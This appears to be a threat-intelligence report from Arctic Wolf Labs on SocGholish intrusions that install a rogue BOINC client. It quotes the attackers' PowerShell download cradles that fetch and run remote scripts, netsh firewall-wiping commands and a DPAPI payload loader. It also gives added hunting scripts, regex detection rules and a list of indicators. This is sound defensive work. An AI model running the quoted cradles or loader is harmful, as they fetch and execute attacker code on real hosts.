Summary
Beginning in early July 2024, Arctic Wolf responded to multiple SocGholish/FakeUpdate intrusions that resulted in a seemingly benign payload being delivered as a second-stage download. The zip file payload contained software from the Berkeley Open Infrastructure for Network Computing (BOINC) project, open-source software that allows users to contribute computing power to scientific research projects focused on solving complex calculations. Notably, multiple BOINC message board users observed nearly identical activity, indicating this could be linked to a larger campaign. Our managed detection and response (MDR) team interrupted and contained the intrusions before the actions on objectives phase, which limited our analysis into how or why the threat actors were using BOINC to further their objectives.
On July 17, Huntress published a blog detailing similar findings to ours. Their blog contains additional insights into this campaign. Combining details from both blogs can help your organization better understand the threat and develop potential detections for this activity.
Technical Analysis
The victim visited a compromised website associated with SocGholish and received a download of Update.js. The JavaScript file was then executed via Windows Script Host (wscript.exe). Upon execution, Update.js leverages PowerShell’s Invoke-WebRequest (iwr) to download a PowerShell script with a Scalable Vector Graphics (SVG) extension, f15.svg, from rzegzwre[.]top and executes it using Invoke-Expression.
The domain was registered by the registrant organization, Xiazhong inc, with NiceNIC.net on May 6, 2024. Since its registration, the domain has been observed hosting PowerShell scripts following a similar naming convention with the use of the .svg file extension.
\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -w h -c \"iwr -usebasicparsing http://rzegzwre.top/f15.svg |iex\"
Although we were not able to review the contents of the PowerShell script with the .svg extension, we observed another PowerShell process being created immediately after the script was executed. When invoked, f15.svg leverages PowerShell to download an additional file (1.php?s=boicn) via curl and invoke it.
\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -c curl -useb 216.245.184.105/1.php?s=boicn| iex
Ultimately, this leads to the download of a BOINC client and scheduled task creation.
The PowerShell script was obfuscated and contained two embedded resources, each base64-encoded and XOR-obfuscated with a key. Each embedded resource is passed to a function dedicated to decoding it. The first part of the script extracts one of the embedded resources: a compressed zip archive that contains the BOINC client (boinc.exe) and its configuration files (cc_config.xml, global_prefs.xml, and account_rosetta.xml). The account_rosetta.xml file is the account file that contains the weak account key used to attach computers to the threat actors' project. BOINC users can designate their own computation projects and distribute pre-configured binaries accordingly. In this case, the threat actors were impersonating the legitimate project Rosetta@home by using a similar project name, rosettahome, and a similarly named domain for the master URL (hxxp://rosettahome[.]top/rosettahome). No tasks were present on the fake project server.
[Figure: rosettahome[.]top default project landing page]
The second decoded resource is a PowerShell script that is responsible for extracting the contents of the decoded zip archive, installing BOINC, and creating a scheduled task to execute the BOINC client.
This PowerShell script first creates a new directory under the Windows %APPDATA% directory and then creates a sub-directory using one of the following strings:
'Software Publishing Updates' 'Licensing Validator Updater' 'EULA Updater' 'Secure Transaction Systems'
The string used for the sub-directory name is selected randomly using the PowerShell Get-Random function with the parameters -Minimum 1 -Maximum 5 (which yields an integer from 1 to 4, since -Maximum is exclusive). This random number is used throughout the script to control various parameters.
Once the directory is created, a new file name for the BOINC executable is chosen using the same random number from the previous step and one of the following values:
'whost' 'trustedinstaller' 'SecurityHealthService' 'gupdate'
The zip archive decoded earlier is then extracted into the installation directory, and the BOINC executable is renamed to the name chosen in the previous step. The script then creates a scheduled task that runs BOINC every 15 minutes under one of the following task names:
'Google_Maintenance' 'MoziilaUpdateService' 'CleanUpMgrTask' 'System_Health_Service'
(Note: 'MoziilaUpdateService' is a typo of Mozilla in the script.)
Lastly, the script creates the registry key HKEY_CURRENT_USER\Software\Microsoft\ExpirienceHost and sets a value of '1' under it (note the typo of 'Experience' in the script).
[Figure: Installation Process]
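The installer leaves a predictable set of host artifacts: one of four directory names under %APPDATA%, a BOINC binary renamed to one of four service-like names, one of four scheduled task names, and the misspelled ExpirienceHost registry key. The following PowerShell is an added example for hunting those artifacts on a single host; it is not Arctic Wolf's code. The names come from the report above, while the function name, the per-profile enumeration and the output format are my own assumptions. It needs the ScheduledTasks module (Windows 8 / Server 2012 or later) and should run as an administrator so that every user's profile and loaded registry hive is visible.

```powershell
# Added example (not from the report): hunt for the rogue BOINC installation artifacts.
$DirNames  = 'Software Publishing Updates','Licensing Validator Updater','EULA Updater','Secure Transaction Systems'
$ExeNames  = 'whost','trustedinstaller','SecurityHealthService','gupdate'
$TaskNames = 'Google_Maintenance','MoziilaUpdateService','CleanUpMgrTask','System_Health_Service'
$RegSubKey = 'Software\Microsoft\ExpirienceHost'   # misspelling is deliberate, as in the installer script

function Find-RogueBoincArtifacts {
    [CmdletBinding()]
    param(
        # Roaming AppData roots to inspect; default is every profile under \Users (assumed layout).
        [string[]]$AppDataRoots = @(Get-ChildItem -Path "$env:SystemDrive\Users" -Directory -ErrorAction SilentlyContinue |
                                     ForEach-Object { Join-Path $_.FullName 'AppData\Roaming' })
    )
    $findings = New-Object System.Collections.Generic.List[object]

    # 1. Scheduled tasks carrying one of the four campaign task names, in any task folder.
    foreach ($task in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        if ($TaskNames -contains $task.TaskName) {
            $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
            $findings.Add([pscustomobject]@{ Type = 'ScheduledTask'; Location = "$($task.TaskPath)$($task.TaskName)"; Detail = $actions })
        }
    }

    # 2. Installation directories, renamed BOINC binaries and the account file that names the master URL.
    foreach ($root in $AppDataRoots) {
        foreach ($dir in $DirNames) {
            $path = Join-Path $root $dir
            if (-not (Test-Path -LiteralPath $path)) { continue }
            $findings.Add([pscustomobject]@{ Type = 'Directory'; Location = $path; Detail = 'campaign directory name' })
            foreach ($exe in Get-ChildItem -LiteralPath $path -Filter '*.exe' -Recurse -ErrorAction SilentlyContinue) {
                if ($ExeNames -contains $exe.BaseName) {
                    $hash = (Get-FileHash -LiteralPath $exe.FullName -Algorithm SHA256).Hash
                    $findings.Add([pscustomobject]@{ Type = 'RenamedBinary'; Location = $exe.FullName; Detail = "SHA256 $hash" })
                }
            }
            foreach ($acct in Get-ChildItem -LiteralPath $path -Filter 'account_*.xml' -Recurse -ErrorAction SilentlyContinue) {
                # BOINC account files record the project master URL the client attaches to.
                $m = Select-String -LiteralPath $acct.FullName -Pattern '<master_url>(.*?)</master_url>' | Select-Object -First 1
                $url = if ($m) { $m.Matches[0].Groups[1].Value } else { '(master_url not found)' }
                $findings.Add([pscustomobject]@{ Type = 'AccountFile'; Location = $acct.FullName; Detail = "master_url=$url" })
            }
        }
    }

    # 3. The registry marker, checked in every loaded user hive rather than only HKCU.
    foreach ($hive in Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue) {
        if ($hive.PSChildName -notmatch '^S-1-5-21-\d+-\d+-\d+-\d+$') { continue }   # real user SIDs only
        $key = "Registry::HKEY_USERS\$($hive.PSChildName)\$RegSubKey"
        if (Test-Path -LiteralPath $key) {
            $values = (Get-ItemProperty -LiteralPath $key).PSObject.Properties |
                      Where-Object { $_.Name -notlike 'PS*' } | ForEach-Object { "$($_.Name)=$($_.Value)" }
            $findings.Add([pscustomobject]@{ Type = 'RegistryKey'; Location = $key; Detail = ($values -join ',') })
        }
    }
    return $findings
}

Find-RogueBoincArtifacts | Format-Table -AutoSize -Wrap
```

Only hives of users who are logged on (or whose profiles have been loaded) appear under HKEY_USERS, so a quiet host may need each NTUSER.DAT loaded with reg.exe before the registry check is complete. Where the ScheduledTasks module is unavailable, `schtasks /query /fo csv /v` gives the same task names and actions for the first check.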
Follow-on Activity
We did not observe any additional activity or network traffic associated with the BOINC client after the initial scheduled task. However, shortly after the scheduled task creation, we observed the PowerShell script f15.svg use net.exe to enumerate the members of the local Administrators group:
```text
C:\Windows\system32\net.exe localgroup Administrators
```
We also observed firewall enumeration and attempts to alter the firewall's configuration:
```powershell
# Adds PowerShell as an allowed program through the firewall
netsh firewall add allowedprogram C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe SystemUpdate ENABLE
# Show state of all firewall profiles
netsh advfirewall show allprofiles state
# Sets the default inbound and outbound actions (block)
netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound
# Removes all rule definitions from the device
netsh advfirewall firewall delete rule all
```
We also observed the threat actor leverage whoami.exe to enumerate groups.
```text
C:\Windows\System32\whoami.exe /groups
```
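The command lines quoted so far (the iwr and curl download cradles launched with a hidden window, the net.exe and whoami.exe enumeration, and the netsh firewall tampering) are the material a process-creation detection would key on. The PowerShell below is an added example and not Arctic Wolf's detection content: the rule names, function names and sample lines are my own, the samples are reconstructed from the commands quoted in this post, and reading from Security event 4688 assumes the "Include command line in process creation events" policy is enabled.

```powershell
# Added example (not from the report): regex rules over process command lines for this intrusion chain.
$Rules = @(
    @{ Name = 'download cradle: web request piped to iex'
       Pattern = '(?i)\b(iwr|invoke-webrequest|invoke-restmethod|curl|wget)\b[^|]*\|\s*(iex|invoke-expression)\b' }
    @{ Name = 'powershell launched with hidden window'
       Pattern = '(?i)powershell(\.exe)?\b.*\s-w(indowstyle)?\s+h(idden)?\b' }
    @{ Name = 'wscript executing Update.js'
       Pattern = '(?i)\bwscript(\.exe)?\b.*\bUpdate\.js\b' }
    @{ Name = 'netsh: all firewall rules deleted'
       Pattern = '(?i)\bnetsh\s+advfirewall\s+firewall\s+delete\s+rule\s+all\b' }
    @{ Name = 'netsh: powershell added as allowed program'
       Pattern = '(?i)\bnetsh\s+firewall\s+add\s+allowedprogram\s+\S*powershell\.exe' }
    @{ Name = 'local Administrators group enumeration'
       Pattern = '(?i)\bnet1?(\.exe)?\s+localgroup\s+administrators\b' }
    @{ Name = 'token group enumeration (whoami /groups)'
       Pattern = '(?i)\bwhoami(\.exe)?\s+/groups\b' }
)

function Test-SuspiciousCommandLine {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$CommandLine)
    # Returns the name of every rule the command line matches; nothing if it is clean.
    $Rules | Where-Object { [regex]::IsMatch($CommandLine, $_.Pattern) } | ForEach-Object { $_.Name }
}

function Get-ProcessCreationCommandLines {
    param([int]$MaxEvents = 5000)
    # Pull CommandLine from Security 4688 via the event XML so no field index is hard-coded.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = ([xml]$_.ToXml()).Event.EventData.Data
            ($data | Where-Object { $_.Name -eq 'CommandLine' }).'#text'
        } | Where-Object { $_ }
}

# Constructed sample input: six lines rebuilt from the report plus one benign control line.
$Samples = @(
    '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "iwr -usebasicparsing http://rzegzwre.top/f15.svg |iex"'
    '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c curl -useb 216.245.184.105/1.php?s=boicn| iex'
    'C:\Windows\system32\net.exe localgroup Administrators'
    'netsh firewall add allowedprogram C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe SystemUpdate ENABLE'
    'netsh advfirewall firewall delete rule all'
    'C:\Windows\System32\whoami.exe /groups'
    '"C:\Program Files\Git\cmd\git.exe" pull'
)

$Samples | ForEach-Object {
    $hits  = @(Test-SuspiciousCommandLine -CommandLine $_)
    $label = if ($hits.Count -gt 0) { $hits -join '; ' } else { '-' }
    [pscustomobject]@{ Hits = $label; CommandLine = $_ }
} | Format-Table -AutoSize -Wrap

# Live use on a host with command-line auditing enabled (uncomment to run):
# Get-ProcessCreationCommandLines | ForEach-Object {
#     $hits = @(Test-SuspiciousCommandLine -CommandLine $_)
#     if ($hits.Count -gt 0) { [pscustomobject]@{ Hits = ($hits -join '; '); CommandLine = $_ } }
# }
```

The first two sample lines trip the download-cradle rule and the first also trips the hidden-window rule; the git line matches nothing. The cradle rule deliberately does not require a URL scheme, because the second-stage download in this intrusion used a bare IP address. The whoami and net rules will also fire on legitimate administration, so they are better weighted as context for the cradle and netsh rules than used alone.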
Subsequently, a script creates a scheduled task named Get-TargetPort that runs a PowerShell function every three minutes. The scheduled task executes the AzureGet-TargetPort function, which reads the encrypted bytes from a file (Get-TargetPort.log), decrypts them using the [System.Security.Cryptography.ProtectedData]::Unprotect API call, and executes the resulting UTF-8 output using Invoke-Expression. The AzureGet-TargetPort function is loaded from the user's PowerShell profile; however, it was not clear at which stage of the payload execution the function was written into the profile. We were not able to review the contents of the Get-TargetPort.log file to garner additional insight into what was being invoked.
```powershell
function AzureGet-TargetPort {
    Add-Type -AssemblyName 'System.Security';
    # Read the DPAPI-protected payload from the log file
    $oebjtkxh = [System.IO.File]::ReadAllBytes('C:\Users\USERNAME\AppData\Local\Microsoft\Windows\Get-TargetPort.log');
    # Decrypt with the machine-scoped DPAPI key
    $pdbyoxmhzeswtj = [System.Security.Cryptography.ProtectedData]::Unprotect($oebjtkxh, $null, [System.Security.Cryptography.DataProtectionScope]::Localmachine);
    # Execute the decrypted script text
    Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($pdbyoxmhzeswtj))
}
```
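Because the payload is protected with DPAPI in LocalMachine scope, it can only be decrypted on the affected host (copying Get-TargetPort.log to an analysis machine will fail), but any account on that host can decrypt it without running it. The PowerShell below is an added example, not code from the report: it reproduces the loader's read-and-Unprotect steps, writes the plaintext to a file for review instead of passing it to Invoke-Expression, and checks the standard profile locations for the loader function. The function names, the output path and the assumption that the file still sits where the loader references it are my own.

```powershell
# Added example (not from the report): recover the DPAPI-protected payload for analysis, and locate the loader.
function Export-DpapiProtectedScript {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$InputPath,
        [Parameter(Mandatory)][string]$OutputPath
    )
    Add-Type -AssemblyName 'System.Security'
    $cipher = [System.IO.File]::ReadAllBytes($InputPath)
    # Same scope the loader used; Unprotect throws CryptographicException on any other machine.
    $plain  = [System.Security.Cryptography.ProtectedData]::Unprotect(
                  $cipher, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine)
    # Write the bytes out untouched for offline review; never hand them to Invoke-Expression.
    [System.IO.File]::WriteAllBytes($OutputPath, $plain)
    [pscustomobject]@{
        Input   = $InputPath
        Output  = $OutputPath
        Bytes   = $plain.Length
        SHA256  = (Get-FileHash -LiteralPath $OutputPath -Algorithm SHA256).Hash
        Preview = [System.Text.Encoding]::UTF8.GetString($plain, 0, [Math]::Min(120, $plain.Length))
    }
}

function Find-ProfileLoader {
    # Checks the four profile files PowerShell evaluates for the current user/host combination.
    $paths = $PROFILE.AllUsersAllHosts, $PROFILE.AllUsersCurrentHost,
             $PROFILE.CurrentUserAllHosts, $PROFILE.CurrentUserCurrentHost
    foreach ($p in $paths) {
        if (-not (Test-Path -LiteralPath $p)) { continue }
        Select-String -LiteralPath $p -Pattern 'AzureGet-TargetPort|ProtectedData\]::Unprotect' |
            ForEach-Object { [pscustomobject]@{ Profile = $p; Line = $_.LineNumber; Text = $_.Line.Trim() } }
    }
}

Find-ProfileLoader | Format-Table -AutoSize -Wrap
# Assumed paths: the loader's log location for the current user and an IR staging directory.
Export-DpapiProtectedScript -InputPath "$env:LOCALAPPDATA\Microsoft\Windows\Get-TargetPort.log" `
                            -OutputPath 'C:\IR\Get-TargetPort.decoded.ps1'
```

Run Find-ProfileLoader as the affected user, since $PROFILE resolves to that user's Documents folder; for other accounts, check C:\Users\<name>\Documents\WindowsPowerShell\profile.ps1 directly. Record the SHA256 of the decoded output in the case file before reviewing it, because the attacker can rewrite Get-TargetPort.log at any time and a later pull may not match.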
Lastly, we observed the threat actor attempting to set up a local proxy server by writing the ProxyServer value under the following registry path:
```text
HKU\S-1-5-21-709456175-1850693151-1850952788-69262\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
```
Tactics, Techniques, And Procedures (TTPs)
Tactic | Technique | Sub-techniques |
---|---|---|
Initial Access | T1189: Drive-by Compromise | |
Execution | T1059: Command and Scripting Interpreter | • T1059.007: JavaScript • T1059.001: PowerShell • T1059.003: Windows Command Shell |
Execution | T1053: Scheduled Task/Job | • T1053.005: Scheduled Task |
Persistence | T1653: Power Settings | |
Defense Evasion | T1140: Deobfuscate/Decode Files or Information | |
Defense Evasion | T1112: Modify Registry | |
Defense Evasion | T1027: Obfuscated Files or Information | • T1027.010: Command Obfuscation • T1027.013: Encrypted/Encoded File |
Discovery | T1087: Account Discovery | • T1087.001: Local Account • T1087.002: Domain Account |
Command and Control | T1105: Ingress Tool Transfer | |
Command and Control | T1090: Proxy | • T1090.001: Internal Proxy |
How Arctic Wolf Protects Its Customers
Arctic Wolf is committed to helping customers reduce their cyber risk, so when active SocGholish campaigns are identified we quickly move to keep them protected.
Arctic Wolf Labs has leveraged threat intelligence around SocGholish TTPs to implement new detections in the Arctic Wolf® Security Operations Platform to protect Arctic Wolf® Managed Detection and Response (MDR) customers. As we discover new information about this threat, we will enhance our detections to account for additional indicators of compromise (IOCs) and techniques leveraged by the SocGholish malware.
Conclusion
Based on our analysis, these intrusions are not the result of a vulnerability in BOINC. Because BOINC is open source and freely available, threat actors can easily use it to create rogue or spoofed BOINC projects to trick users. The threat actor is installing a legitimate BOINC client and configuring it to connect to their own server. Few details are known as to why the threat actor is installing the BOINC client; because our MDR team interrupted the intrusion chain, we were not able to identify traffic back to the threat actor-owned server. The abuse of open source software is not new or novel; threat actors consistently leverage freely available software to carry out malicious actions during an intrusion. However, this is the first case of a threat actor abusing BOINC to further their goals.
We will continue to investigate similar intrusions to better understand the threat and enhance our detections. The BOINC project is also actively investigating nearly identical intrusions observed by their forum members. Arctic Wolf Labs reached out to the University of Berkeley to notify them of our observed malicious use of BOINC, but did not receive a communication back.
Appendix
Indicators of Compromise (IoCs)
Indicator | Type | Description |
---|---|---|
qalw.fans.smalladventureguide[.]com | URL | SocGholish associated domain |
87593c20fa6361408d9c1c53180074a9224df1623ff2bd8c1c2961346d5a38df | SHA256 | Obfuscated PowerShell script that contains two embedded resources. (1.php?s=boicn) |
187dc7454a18af3a4dd7d386e1cf7ab522664d8b6e30ddc2dae5204403bc5504 | SHA256 | Zip file containing BOINC client and configuration files |
5BDDE3507BE7030F022B5D48E8088D419C6B04B422B81E327C2A19547C212797 | SHA256 | BOINC installer script |
http[:]//rosettahome[.]top/rosettahome/ | URL | Main URL for Hosted BOINC Server |
yxh.parish.chuathuongxot[.]org | Domain | Observed DNS query; SocGholish associated domain |
http[:]//rzegzwre[.]top/f15.svg | URL | First stage payload URL |
216.245.184[.]105/1.php?s=boicn | URL | Second stage payload URL |
gggkmibncajjjic[.]top | Domain | Observed DNS query |
f04tb1itjdltmym[.]top | Domain | Observed DNS query |
Note: rzegzwre[.]top and multiple other domains observed in our logs were tied to a single registrant organization, Xiazhong inc. By pivoting on this registrant organization, additional associated domains can be found matching the naming convention and registrar.
Additional Resources
Get forward-thinking insights along with practical guidance you can apply to your organization in the Arctic Wolf Labs 2024 Threat Report.
Learn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000 global IT and security leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.
About Arctic Wolf Labs
Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence, including machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. With their deep domain knowledge, Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.
Steven Campbell
Steven Campbell is a Lead Threat Intelligence Researcher at Arctic Wolf Labs and has more than eight years of experience in intelligence analysis and security research. He has a strong background in infrastructure analysis and adversary tradecraft.
Akshay Suthar
Akshay Suthar is a Senior Threat Intelligence Researcher at Arctic Wolf Labs focused on researching adversary tradecraft and malware analysis. He has more than seven years of experience in a multitude of domains including threat intelligence research, detection engineering, and intrusion analysis.
Markus Neis
Markus Neis is a Principal Threat Intelligence Researcher in Arctic Wolf Labs focused on leading advanced threat research. He has more than a decade of experience in researching adversary tradecraft and responding to sophisticated attacks.
Trevor Daher
Trevor Daher is a Technical Lead within Arctic Wolf’s Security Services group supporting the Managed Detection and Response (MDR) service. He has 7 years’ industry experience as a security analyst and as a security consultant.
Jon Grimm
Jon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing actionable intelligence that enhances organizational defenses. He has a background of 10 years' experience in several domains of cybersecurity, holds a bachelor's degree in law enforcement, and holds several industry certifications (CISSP, GCFA, GCTI).
Stefan Hostetler
Stefan is a Senior Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he focuses on extracting actionable insight from novel threats to help organizations protect themselves effectively.
Christopher Prest
Christopher is a Lead Security Researcher and a 17-year veteran in Software and Application security development, coupled with 2 years of cutting edge detection engineering and security research. A seasoned expert, Christopher focuses on Malware analysis and reverse engineering to shape the future of cybersecurity.